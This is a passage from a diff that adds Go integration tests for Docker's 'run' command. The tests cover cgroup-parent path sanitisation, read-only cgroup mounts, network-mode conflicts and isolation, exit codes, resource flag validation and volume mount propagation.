+		c.Fatalf("unexpected failure when running container with --cgroup-parent option - %s\n%v", string(out), err)
+	}
+
+	// We expect "/SHOULD_NOT_EXIST" to not exist. If not, we have a security issue.
+	if _, err := os.Stat("/SHOULD_NOT_EXIST"); err == nil || !os.IsNotExist(err) {
+		c.Fatalf("SECURITY: --cgroup-parent with /../../ garbage paths cause files to be created in the host (this is bad) !!")
+	}
+
+	cgroupPaths := parseCgroupPaths(string(out))
+	if len(cgroupPaths) == 0 {
+		c.Fatalf("unexpected output - %q", string(out))
+	}
+	id, err := getIDByName(name)
+	c.Assert(err, check.IsNil)
+	expectedCgroup := path.Join(cleanCgroupParent, id)
+	found := false
+	for _, path := range cgroupPaths {
+		if strings.HasSuffix(path, expectedCgroup) {
+			found = true
+			break
+		}
+	}
+	if !found {
+		c.Fatalf("unexpected cgroup paths. Expected at least one cgroup path to have suffix %q. Cgroup Paths: %v", expectedCgroup, cgroupPaths)
+	}
+}
+
+func (s *DockerSuite) TestRunContainerWithCgroupMountRO(c *check.C) {
+	// Not applicable on Windows as uses Unix specific functionality
+	// --read-only + userns has remount issues
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+
+	filename := "/sys/fs/cgroup/devices/test123"
+	out, _, err := dockerCmdWithError("run", "busybox", "touch", filename)
+	if err == nil {
+		c.Fatal("expected cgroup mount point to be read-only, touch file should fail")
+	}
+	expected := "Read-only file system"
+	if !strings.Contains(out, expected) {
+		c.Fatalf("expected output from failure to contain %s but contains %s", expected, out)
+	}
+}
+
+func (s *DockerSuite) TestRunContainerNetworkModeToSelf(c *check.C) {
+	// Not applicable on Windows which does not support --net=container
+	testRequires(c, DaemonIsLinux)
+	out, _, err := dockerCmdWithError("run", "--name=me", "--net=container:me", "busybox", "true")
+	if err == nil || !strings.Contains(out, "cannot join own network") {
+		c.Fatalf("using container net mode to self should result in an error\nerr: %q\nout: %s", err, out)
+	}
+}
+
+func (s *DockerSuite) TestRunContainerNetModeWithDNSMacHosts(c *check.C) {
+	// Not applicable on Windows which does not support --net=container
+	testRequires(c, DaemonIsLinux)
+	out, _, err := dockerCmdWithError("run", "-d", "--name", "parent", "busybox", "top")
+	if err != nil {
+		c.Fatalf("failed to run container: %v, output: %q", err, out)
+	}
+
+	out, _, err = dockerCmdWithError("run", "--dns", "1.2.3.4", "--net=container:parent", "busybox")
+	if err == nil || !strings.Contains(out, runconfig.ErrConflictNetworkAndDNS.Error()) {
+		c.Fatalf("run --net=container with --dns should error out")
+	}
+
+	out, _, err = dockerCmdWithError("run", "--mac-address", "92:d0:c6:0a:29:33", "--net=container:parent", "busybox")
+	if err == nil || !strings.Contains(out, runconfig.ErrConflictContainerNetworkAndMac.Error()) {
+		c.Fatalf("run --net=container with --mac-address should error out")
+	}
+
+	out, _, err = dockerCmdWithError("run", "--add-host", "test:192.168.2.109", "--net=container:parent", "busybox")
+	if err == nil || !strings.Contains(out, runconfig.ErrConflictNetworkHosts.Error()) {
+		c.Fatalf("run --net=container with --add-host should error out")
+	}
+}
+
+func (s *DockerSuite) TestRunContainerNetModeWithExposePort(c *check.C) {
+	// Not applicable on Windows which does not support --net=container
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "-d", "--name", "parent", "busybox", "top")
+
+	out, _, err := dockerCmdWithError("run", "-p", "5000:5000", "--net=container:parent", "busybox")
+	if err == nil || !strings.Contains(out, runconfig.ErrConflictNetworkPublishPorts.Error()) {
+		c.Fatalf("run --net=container with -p should error out")
+	}
+
+	out, _, err = dockerCmdWithError("run", "-P", "--net=container:parent", "busybox")
+	if err == nil || !strings.Contains(out, runconfig.ErrConflictNetworkPublishPorts.Error()) {
+		c.Fatalf("run --net=container with -P should error out")
+	}
+
+	out, _, err = dockerCmdWithError("run", "--expose", "5000", "--net=container:parent", "busybox")
+	if err == nil || !strings.Contains(out, runconfig.ErrConflictNetworkExposePorts.Error()) {
+		c.Fatalf("run --net=container with --expose should error out")
+	}
+}
+
+func (s *DockerSuite) TestRunLinkToContainerNetMode(c *check.C) {
+	// Not applicable on Windows which does not support --net=container or --link
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "--name", "test", "-d", "busybox", "top")
+	dockerCmd(c, "run", "--name", "parent", "-d", "--net=container:test", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--link=parent:parent", "busybox", "top")
+	dockerCmd(c, "run", "--name", "child", "-d", "--net=container:parent", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--link=child:child", "busybox", "top")
+}
+
+func (s *DockerSuite) TestRunLoopbackOnlyExistsWhenNetworkingDisabled(c *check.C) {
+	// TODO Windows: This may be possible to convert.
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "--net=none", "busybox", "ip", "-o", "-4", "a", "show", "up")
+
+	var (
+		count = 0
+		parts = strings.Split(out, "\n")
+	)
+
+	for _, l := range parts {
+		if l != "" {
+			count++
+		}
+	}
+
+	if count != 1 {
+		c.Fatalf("Wrong interface count in container %d", count)
+	}
+
+	if !strings.HasPrefix(out, "1: lo") {
+		c.Fatalf("Wrong interface in test container: expected [1: lo], got %s", out)
+	}
+}
+
+// Issue #4681
+func (s *DockerSuite) TestRunLoopbackWhenNetworkDisabled(c *check.C) {
+	if daemonPlatform == "windows" {
+		dockerCmd(c, "run", "--net=none", WindowsBaseImage, "ping", "-n", "1", "127.0.0.1")
+	} else {
+		dockerCmd(c, "run", "--net=none", "busybox", "ping", "-c", "1", "127.0.0.1")
+	}
+}
+
+func (s *DockerSuite) TestRunModeNetContainerHostname(c *check.C) {
+	// Windows does not support --net=container
+	testRequires(c, DaemonIsLinux, ExecSupport)
+
+	dockerCmd(c, "run", "-i", "-d", "--name", "parent", "busybox", "top")
+	out, _ := dockerCmd(c, "exec", "parent", "cat", "/etc/hostname")
+	out1, _ := dockerCmd(c, "run", "--net=container:parent", "busybox", "cat", "/etc/hostname")
+
+	if out1 != out {
+		c.Fatal("containers with shared net namespace should have same hostname")
+	}
+}
+
+func (s *DockerSuite) TestRunNetworkNotInitializedNoneMode(c *check.C) {
+	// TODO Windows: Network settings are not currently propagated. This may
+	// be resolved in the future with the move to libnetwork and CNM.
+	testRequires(c, DaemonIsLinux)
+	out, _ := dockerCmd(c, "run", "-d", "--net=none", "busybox", "top")
+	id := strings.TrimSpace(out)
+	res := inspectField(c, id, "NetworkSettings.Networks.none.IPAddress")
+	if res != "" {
+		c.Fatalf("For 'none' mode network must not be initialized, but container got IP: %s", res)
+	}
+}
+
+func (s *DockerSuite) TestTwoContainersInNetHost(c *check.C) {
+	// Not applicable as Windows does not support --net=host
+	testRequires(c, DaemonIsLinux, NotUserNamespace, NotUserNamespace)
+	dockerCmd(c, "run", "-d", "--net=host", "--name=first", "busybox", "top")
+	dockerCmd(c, "run", "-d", "--net=host", "--name=second", "busybox", "top")
+	dockerCmd(c, "stop", "first")
+	dockerCmd(c, "stop", "second")
+}
+
+func (s *DockerSuite) TestContainersInUserDefinedNetwork(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm)
+	dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork")
+	dockerCmd(c, "run", "-d", "--net=testnetwork", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+	dockerCmd(c, "run", "-t", "--net=testnetwork", "--name=second", "busybox", "ping", "-c", "1", "first")
+}
+
+func (s *DockerSuite) TestContainersInMultipleNetworks(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm)
+	// Create 2 networks using bridge driver
+	dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1")
+	dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork2")
+	// Run and connect containers to testnetwork1
+	dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+	dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=second", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+	// Check connectivity between containers in testnetwork2
+	dockerCmd(c, "exec", "first", "ping", "-c", "1", "second.testnetwork1")
+	// Connect containers to testnetwork2
+	dockerCmd(c, "network", "connect", "testnetwork2", "first")
+	dockerCmd(c, "network", "connect", "testnetwork2", "second")
+	// Check connectivity between containers
+	dockerCmd(c, "exec", "second", "ping", "-c", "1", "first.testnetwork2")
+}
+
+func (s *DockerSuite) TestContainersNetworkIsolation(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm)
+	// Create 2 networks using bridge driver
+	dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1")
+	dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork2")
+	// Run 1 container in testnetwork1 and another in testnetwork2
+	dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+	dockerCmd(c, "run", "-d", "--net=testnetwork2", "--name=second", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+
+	// Check Isolation between containers : ping must fail
+	_, _, err := dockerCmdWithError("exec", "first", "ping", "-c", "1", "second")
+	c.Assert(err, check.NotNil)
+	// Connect first container to testnetwork2
+	dockerCmd(c, "network", "connect", "testnetwork2", "first")
+	// ping must succeed now
+	_, _, err = dockerCmdWithError("exec", "first", "ping", "-c", "1", "second")
+	c.Assert(err, check.IsNil)
+
+	// Disconnect first container from testnetwork2
+	dockerCmd(c, "network", "disconnect", "testnetwork2", "first")
+	// ping must fail again
+	_, _, err = dockerCmdWithError("exec", "first", "ping", "-c", "1", "second")
+	c.Assert(err, check.NotNil)
+}
+
+func (s *DockerSuite) TestNetworkRmWithActiveContainers(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	// Create 2 networks using bridge driver
+	dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1")
+	// Run and connect containers to testnetwork1
+	dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+	dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=second", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+	// Network delete with active containers must fail
+	_, _, err := dockerCmdWithError("network", "rm", "testnetwork1")
+	c.Assert(err, check.NotNil)
+
+	dockerCmd(c, "stop", "first")
+	_, _, err = dockerCmdWithError("network", "rm", "testnetwork1")
+	c.Assert(err, check.NotNil)
+}
+
+func (s *DockerSuite) TestContainerRestartInMultipleNetworks(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace, NotArm)
+	// Create 2 networks using bridge driver
+	dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1")
+	dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork2")
+
+	// Run and connect containers to testnetwork1
+	dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+	dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=second", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+	// Check connectivity between containers in testnetwork2
+	dockerCmd(c, "exec", "first", "ping", "-c", "1", "second.testnetwork1")
+	// Connect containers to testnetwork2
+	dockerCmd(c, "network", "connect", "testnetwork2", "first")
+	dockerCmd(c, "network", "connect", "testnetwork2", "second")
+	// Check connectivity between containers
+	dockerCmd(c, "exec", "second", "ping", "-c", "1", "first.testnetwork2")
+
+	// Stop second container and test ping failures on both networks
+	dockerCmd(c, "stop", "second")
+	_, _, err := dockerCmdWithError("exec", "first", "ping", "-c", "1", "second.testnetwork1")
+	c.Assert(err, check.NotNil)
+	_, _, err = dockerCmdWithError("exec", "first", "ping", "-c", "1", "second.testnetwork2")
+	c.Assert(err, check.NotNil)
+
+	// Start second container and connectivity must be restored on both networks
+	dockerCmd(c, "start", "second")
+	dockerCmd(c, "exec", "first", "ping", "-c", "1", "second.testnetwork1")
+	dockerCmd(c, "exec", "second", "ping", "-c", "1", "first.testnetwork2")
+}
+
+func (s *DockerSuite) TestContainerWithConflictingHostNetworks(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	// Run a container with --net=host
+	dockerCmd(c, "run", "-d", "--net=host", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+
+	// Create a network using bridge driver
+	dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1")
+
+	// Connecting to the user defined network must fail
+	_, _, err := dockerCmdWithError("network", "connect", "testnetwork1", "first")
+	c.Assert(err, check.NotNil)
+}
+
+func (s *DockerSuite) TestContainerWithConflictingSharedNetwork(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "-d", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+	// Run second container in first container's network namespace
+	dockerCmd(c, "run", "-d", "--net=container:first", "--name=second", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+
+	// Create a network using bridge driver
+	dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1")
+
+	// Connecting to the user defined network must fail
+	out, _, err := dockerCmdWithError("network", "connect", "testnetwork1", "second")
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, runconfig.ErrConflictSharedNetwork.Error())
+}
+
+func (s *DockerSuite) TestContainerWithConflictingNoneNetwork(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "-d", "--net=none", "--name=first", "busybox", "top")
+	c.Assert(waitRun("first"), check.IsNil)
+
+	// Create a network using bridge driver
+	dockerCmd(c, "network", "create", "-d", "bridge", "testnetwork1")
+
+	// Connecting to the user defined network must fail
+	out, _, err := dockerCmdWithError("network", "connect", "testnetwork1", "first")
+	c.Assert(err, check.NotNil)
+	c.Assert(out, checker.Contains, runconfig.ErrConflictNoNetwork.Error())
+
+	// create a container connected to testnetwork1
+	dockerCmd(c, "run", "-d", "--net=testnetwork1", "--name=second", "busybox", "top")
+	c.Assert(waitRun("second"), check.IsNil)
+
+	// Connect second container to none network. it must fail as well
+	_, _, err = dockerCmdWithError("network", "connect", "none", "second")
+	c.Assert(err, check.NotNil)
+}
+
+// #11957 - stdin with no tty does not exit if stdin is not closed even though container exited
+func (s *DockerSuite) TestRunStdinBlockedAfterContainerExit(c *check.C) {
+	cmd := exec.Command(dockerBinary, "run", "-i", "--name=test", "busybox", "true")
+	in, err := cmd.StdinPipe()
+	c.Assert(err, check.IsNil)
+	defer in.Close()
+	stdout := bytes.NewBuffer(nil)
+	cmd.Stdout = stdout
+	cmd.Stderr = stdout
+	c.Assert(cmd.Start(), check.IsNil)
+
+	waitChan := make(chan error)
+	go func() {
+		waitChan <- cmd.Wait()
+	}()
+
+	select {
+	case err := <-waitChan:
+		c.Assert(err, check.IsNil, check.Commentf(stdout.String()))
+	case <-time.After(30 * time.Second):
+		c.Fatal("timeout waiting for command to exit")
+	}
+}
+
+func (s *DockerSuite) TestRunWrongCpusetCpusFlagValue(c *check.C) {
+	// TODO Windows: This needs validation (error out) in the daemon.
+	testRequires(c, DaemonIsLinux)
+	out, exitCode, err := dockerCmdWithError("run", "--cpuset-cpus", "1-10,11--", "busybox", "true")
+	c.Assert(err, check.NotNil)
+	expected := "Error response from daemon: Invalid value 1-10,11-- for cpuset cpus.\n"
+	if !(strings.Contains(out, expected) || exitCode == 125) {
+		c.Fatalf("Expected output to contain %q with exitCode 125, got out: %q exitCode: %v", expected, out, exitCode)
+	}
+}
+
+func (s *DockerSuite) TestRunWrongCpusetMemsFlagValue(c *check.C) {
+	// TODO Windows: This needs validation (error out) in the daemon.
+	testRequires(c, DaemonIsLinux)
+	out, exitCode, err := dockerCmdWithError("run", "--cpuset-mems", "1-42--", "busybox", "true")
+	c.Assert(err, check.NotNil)
+	expected := "Error response from daemon: Invalid value 1-42-- for cpuset mems.\n"
+	if !(strings.Contains(out, expected) || exitCode == 125) {
+		c.Fatalf("Expected output to contain %q with exitCode 125, got out: %q exitCode: %v", expected, out, exitCode)
+	}
+}
+
+// TestRunNonExecutableCmd checks that 'docker run busybox foo' exits with error code 127'
+func (s *DockerSuite) TestRunNonExecutableCmd(c *check.C) {
+	name := "testNonExecutableCmd"
+	runCmd := exec.Command(dockerBinary, "run", "--name", name, "busybox", "foo")
+	_, exit, _ := runCommandWithOutput(runCmd)
+	stateExitCode := findContainerExitCode(c, name)
+	if !(exit == 127 && strings.Contains(stateExitCode, "127")) {
+		c.Fatalf("Run non-executable command should have errored with exit code 127, but we got exit: %d, State.ExitCode: %s", exit, stateExitCode)
+	}
+}
+
+// TestRunNonExistingCmd checks that 'docker run busybox /bin/foo' exits with code 127.
+func (s *DockerSuite) TestRunNonExistingCmd(c *check.C) {
+	name := "testNonExistingCmd"
+	runCmd := exec.Command(dockerBinary, "run", "--name", name, "busybox", "/bin/foo")
+	_, exit, _ := runCommandWithOutput(runCmd)
+	stateExitCode := findContainerExitCode(c, name)
+	if !(exit == 127 && strings.Contains(stateExitCode, "127")) {
+		c.Fatalf("Run non-existing command should have errored with exit code 127, but we got exit: %d, State.ExitCode: %s", exit, stateExitCode)
+	}
+}
+
+// TestCmdCannotBeInvoked checks that 'docker run busybox /etc' exits with 126, or
+// 127 on Windows. The difference is that in Windows, the container must be started
+// as that's when the check is made (and yes, by its design...)
+func (s *DockerSuite) TestCmdCannotBeInvoked(c *check.C) {
+	expected := 126
+	if daemonPlatform == "windows" {
+		expected = 127
+	}
+	name := "testCmdCannotBeInvoked"
+	runCmd := exec.Command(dockerBinary, "run", "--name", name, "busybox", "/etc")
+	_, exit, _ := runCommandWithOutput(runCmd)
+	stateExitCode := findContainerExitCode(c, name)
+	if !(exit == expected && strings.Contains(stateExitCode, strconv.Itoa(expected))) {
+		c.Fatalf("Run cmd that cannot be invoked should have errored with code %d, but we got exit: %d, State.ExitCode: %s", expected, exit, stateExitCode)
+	}
+}
+
+// TestRunNonExistingImage checks that 'docker run foo' exits with error msg 125 and contains  'Unable to find image'
+func (s *DockerSuite) TestRunNonExistingImage(c *check.C) {
+	runCmd := exec.Command(dockerBinary, "run", "foo")
+	out, exit, err := runCommandWithOutput(runCmd)
+	if !(err != nil && exit == 125 && strings.Contains(out, "Unable to find image")) {
+		c.Fatalf("Run non-existing image should have errored with 'Unable to find image' code 125, but we got out: %s, exit: %d, err: %s", out, exit, err)
+	}
+}
+
+// TestDockerFails checks that 'docker run -foo busybox' exits with 125 to signal docker run failed
+func (s *DockerSuite) TestDockerFails(c *check.C) {
+	runCmd := exec.Command(dockerBinary, "run", "-foo", "busybox")
+	out, exit, err := runCommandWithOutput(runCmd)
+	if !(err != nil && exit == 125) {
+		c.Fatalf("Docker run with flag not defined should exit with 125, but we got out: %s, exit: %d, err: %s", out, exit, err)
+	}
+}
+
+// TestRunInvalidReference invokes docker run with a bad reference.
+func (s *DockerSuite) TestRunInvalidReference(c *check.C) {
+	out, exit, _ := dockerCmdWithError("run", "busybox@foo")
+	if exit == 0 {
+		c.Fatalf("expected non-zero exist code; received %d", exit)
+	}
+
+	if !strings.Contains(out, "Error parsing reference") {
+		c.Fatalf(`Expected "Error parsing reference" in output; got: %s`, out)
+	}
+}
+
+// Test fix for issue #17854
+func (s *DockerSuite) TestRunInitLayerPathOwnership(c *check.C) {
+	// Not applicable on Windows as it does not support Linux uid/gid ownership
+	testRequires(c, DaemonIsLinux)
+	name := "testetcfileownership"
+	_, err := buildImage(name,
+		`FROM busybox
+		RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
+		RUN echo 'dockerio:x:1001:' >> /etc/group
+		RUN chown dockerio:dockerio /etc`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	// Test that dockerio ownership of /etc is retained at runtime
+	out, _ := dockerCmd(c, "run", "--rm", name, "stat", "-c", "%U:%G", "/etc")
+	out = strings.TrimSpace(out)
+	if out != "dockerio:dockerio" {
+		c.Fatalf("Wrong /etc ownership: expected dockerio:dockerio, got %q", out)
+	}
+}
+
+func (s *DockerSuite) TestRunWithOomScoreAdj(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	expected := "642"
+	out, _ := dockerCmd(c, "run", "--oom-score-adj", expected, "busybox", "cat", "/proc/self/oom_score_adj")
+	oomScoreAdj := strings.TrimSpace(out)
+	if oomScoreAdj != "642" {
+		c.Fatalf("Expected oom_score_adj set to %q, got %q instead", expected, oomScoreAdj)
+	}
+}
+
+func (s *DockerSuite) TestRunWithOomScoreAdjInvalidRange(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	out, _, err := dockerCmdWithError("run", "--oom-score-adj", "1001", "busybox", "true")
+	c.Assert(err, check.NotNil)
+	expected := "Invalid value 1001, range for oom score adj is [-1000, 1000]."
+	if !strings.Contains(out, expected) {
+		c.Fatalf("Expected output to contain %q, got %q instead", expected, out)
+	}
+	out, _, err = dockerCmdWithError("run", "--oom-score-adj", "-1001", "busybox", "true")
+	c.Assert(err, check.NotNil)
+	expected = "Invalid value -1001, range for oom score adj is [-1000, 1000]."
+	if !strings.Contains(out, expected) {
+		c.Fatalf("Expected output to contain %q, got %q instead", expected, out)
+	}
+}
+
+func (s *DockerSuite) TestRunVolumesMountedAsShared(c *check.C) {
+	// Volume propagation is linux only. Also it creates directories for
+	// bind mounting, so needs to be same host.
+	testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace)
+
+	// Prepare a source directory to bind mount
+	tmpDir, err := ioutil.TempDir("", "volume-source")
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer os.RemoveAll(tmpDir)
+
+	if err := os.Mkdir(path.Join(tmpDir, "mnt1"), 0755); err != nil {
+		c.Fatal(err)
+	}
+
+	// Convert this directory into a shared mount point so that we do
+	// not rely on propagation properties of parent mount.
+	cmd := exec.Command("mount", "--bind", tmpDir, tmpDir)
+	if _, err = runCommand(cmd); err != nil {
+		c.Fatal(err)
+	}
+
+	cmd = exec.Command("mount", "--make-private", "--make-shared", tmpDir)
+	if _, err = runCommand(cmd); err != nil {
+		c.Fatal(err)
+	}
+
+	dockerCmd(c, "run", "--privileged", "-v", fmt.Sprintf("%s:/volume-dest:shared", tmpDir), "busybox", "mount", "--bind", "/volume-dest/mnt1", "/volume-dest/mnt1")
+
+	// Make sure a bind mount under a shared volume propagated to host.
+	if mounted, _ := mount.Mounted(path.Join(tmpDir, "mnt1")); !mounted {
+		c.Fatalf("Bind mount under shared volume did not propagate to host")
+	}
+
+	mount.Unmount(path.Join(tmpDir, "mnt1"))
+}
+
+func (s *DockerSuite) TestRunVolumesMountedAsSlave(c *check.C) {
+	// Volume propagation is linux only. Also it creates directories for
+	// bind mounting, so needs to be same host.
+	testRequires(c, DaemonIsLinux, SameHostDaemon, NotUserNamespace)
+
+	// Prepare a source directory to bind mount
+	tmpDir, err := ioutil.TempDir("", "volume-source")
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer os.RemoveAll(tmpDir)
+
+	if err := os.Mkdir(path.Join(tmpDir, "mnt1"), 0755); err != nil {
+		c.Fatal(err)
+	}
+
+	// Prepare a source directory with file in it. We will bind mount this
+	// directory and see if file shows up.
+	tmpDir2, err := ioutil.TempDir("", "volume-source2")
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer os.RemoveAll(tmpDir2)
+
+	if err := ioutil.WriteFile(path.Join(tmpDir2, "slave-testfile"), []byte("Test"), 0644); err != nil {
+		c.Fatal(err)
+	}
+
+	// Convert this directory into a shared mount point so that we do
+	// not rely on propagation properties of parent mount.
+	cmd := exec.Command("mount", "--bind", tmpDir, tmpDir)
+	if _, err = runCommand(cmd); err != nil {
+		c.Fatal(err)
+	}
+
+	cmd = exec.Command("mount", "--make-private", "--make-shared", tmpDir)
+	if _, err = runCommand(cmd); err != nil {
+		c.Fatal(err)
+	}
+
+	dockerCmd(c, "run", "-i", "-d", "--name", "parent", "-v", fmt.Sprintf("%s:/volume-dest:slave", tmpDir), "busybox", "top")
+
+	// Bind mount tmpDir2/ onto tmpDir/mnt1. If mount propagates inside
+	// container then contents of tmpDir2/slave-testfile should become
+	// visible at "/volume-dest/mnt1/slave-testfile"
+	cmd = exec.Command("mount", "--bind", tmpDir2, path.Join(tmpDir, "mnt1"))
+	if _, err = runCommand(cmd); err != nil {
+		c.Fatal(err)
+	}
+
+	out, _ := dockerCmd(c, "exec", "parent", "cat", "/volume-dest/mnt1/slave-testfile")
+
+	mount.Unmount(path.Join(tmpDir, "mnt1"))
+
+	if out != "Test" {
+		c.Fatalf("Bind mount under slave volume did not propagate to container")
+	}
+}
+
+func (s *DockerSuite) TestRunNamedVolumesMountedAsShared(c *check.C) {
+	testRequires(c, DaemonIsLinux, NotUserNamespace)
+	out, exitCode, _ := dockerCmdWithError("run", "-v", "foo:/test:shared", "busybox", "touch", "/test/somefile")
+	c.Assert(exitCode, checker.Not(checker.Equals), 0)
+	c.Assert(out, checker.Contains, "invalid mount config")
+}
+
+func (s *DockerSuite) TestRunNamedVolumeCopyImageData(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	testImg := "testvolumecopy"
+	_, err := buildImage(testImg, `
+	FROM busybox
+	RUN mkdir -p /foo && echo hello > /foo/hello
+	`, true)
+	c.Assert(err, check.IsNil)
+
+	dockerCmd(c, "run", "-v", "foo:/foo", testImg)
+	out, _ := dockerCmd(c, "run", "-v", "foo:/foo", "busybox", "cat", "/foo/hello")
+	c.Assert(strings.TrimSpace(out), check.Equals, "hello")
+}
+
+func (s *DockerSuite) TestRunNamedVolumeNotRemoved(c *check.C) {
+	prefix, _ := getPrefixAndSlashFromDaemonPlatform()
+
+	dockerCmd(c, "volume", "create", "test")
+
+	dockerCmd(c, "run", "--rm", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true")
+	dockerCmd(c, "volume", "inspect", "test")
+	out, _ := dockerCmd(c, "volume", "ls", "-q")
+	c.Assert(strings.TrimSpace(out), checker.Equals, "test")
+
+	dockerCmd(c, "run", "--name=test", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true")
+	dockerCmd(c, "rm", "-fv", "test")
+	dockerCmd(c, "volume", "inspect", "test")
+	out, _ = dockerCmd(c, "volume", "ls", "-q")
+	c.Assert(strings.TrimSpace(out), checker.Equals, "test")
+}
+
+func (s *DockerSuite) TestRunNamedVolumesFromNotRemoved(c *check.C) {
+	prefix, _ := getPrefixAndSlashFromDaemonPlatform()
+
+	dockerCmd(c, "volume", "create", "test")
+	dockerCmd(c, "run", "--name=parent", "-v", "test:"+prefix+"/foo", "-v", prefix+"/bar", "busybox", "true")
+	dockerCmd(c, "run", "--name=child", "--volumes-from=parent", "busybox", "true")
+
+	// Remove the parent so there are not other references to the volumes
+	dockerCmd(c, "rm", "-f", "parent")
+	// now remove the child and ensure the named volume (and only the named volume) still exists
+	dockerCmd(c, "rm", "-fv", "child")
+	dockerCmd(c, "volume", "inspect", "test")
+	out, _ := dockerCmd(c, "volume", "ls", "-q")
+	c.Assert(strings.TrimSpace(out), checker.Equals, "test")
+}
+
+func (s *DockerSuite) TestRunAttachFailedNoLeak(c *check.C) {
+	nroutines, err := getGoroutineNumber()
+	c.Assert(err, checker.IsNil)
+
+	runSleepingContainer(c, "--name=test", "-p", "8000:8000")
+
+	// Wait until container is fully up and running
+	c.Assert(waitRun("test"), check.IsNil)
+
+	out, _, err := dockerCmdWithError("run", "--name=fail", "-p", "8000:8000", "busybox", "true")
+	// We will need the following `inspect` to diagnose the issue if test fails (#21247)
+	out1, err1 := dockerCmd(c, "inspect", "--format", "{{json .State}}", "test")
+	out2, err2 := dockerCmd(c, "inspect", "--format", "{{json .State}}", "fail")
+	c.Assert(err, checker.NotNil, check.Commentf("Command should have failed but succeeded with: %s\nContainer 'test' [%+v]: %s\nContainer 'fail' [%+v]: %s", out, err1, out1, err2, out2))
+	// check for windows error as well
+	// TODO Windows Post TP5. Fix the error message string
+	c.Assert(strings.Contains(string(out), "port is already allocated") ||
+		strings.Contains(string(out), "were not connected because a duplicate name exists") ||
+		strings.Contains(string(out), "HNS failed with error : Failed to create endpoint") ||
+		strings.Contains(string(out), "HNS failed with error : The object already exists"), checker.Equals, true, check.Commentf("Output: %s", out))
+	dockerCmd(c, "rm", "-f", "test")
+
+	// NGoroutines is not updated right away, so we need to wait before failing
+	c.Assert(waitForGoroutines(nroutines), checker.IsNil)
+}
+
+// Test for one character directory name case (#20122)
+func (s *DockerSuite) TestRunVolumeWithOneCharacter(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+
+	out, _ := dockerCmd(c, "run", "-v", "/tmp/q:/foo", "busybox", "sh", "-c", "find /foo")
+	c.Assert(strings.TrimSpace(out), checker.Equals, "/foo")
+}
+
+func (s *DockerSuite) TestRunVolumeCopyFlag(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Windows does not support copying data from image to the volume
+	_, err := buildImage("volumecopy",
+		`FROM busybox
+		RUN mkdir /foo && echo hello > /foo/bar
+		CMD cat /foo/bar`,
+		true,
+	)
+	c.Assert(err, checker.IsNil)
+
+	dockerCmd(c, "volume", "create", "test")
+
+	// test with the nocopy flag
+	out, _, err := dockerCmdWithError("run", "-v", "test:/foo:nocopy", "volumecopy")
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	// test default behavior which is to copy for non-binds
+	out, _ = dockerCmd(c, "run", "-v", "test:/foo", "volumecopy")
+	c.Assert(strings.TrimSpace(out), checker.Equals, "hello")
+	// error out when the volume is already populated
+	out, _, err = dockerCmdWithError("run", "-v", "test:/foo:copy", "volumecopy")
+	c.Assert(err, checker.NotNil, check.Commentf(out))
+	// do not error out when copy isn't explicitly set even though it's already populated
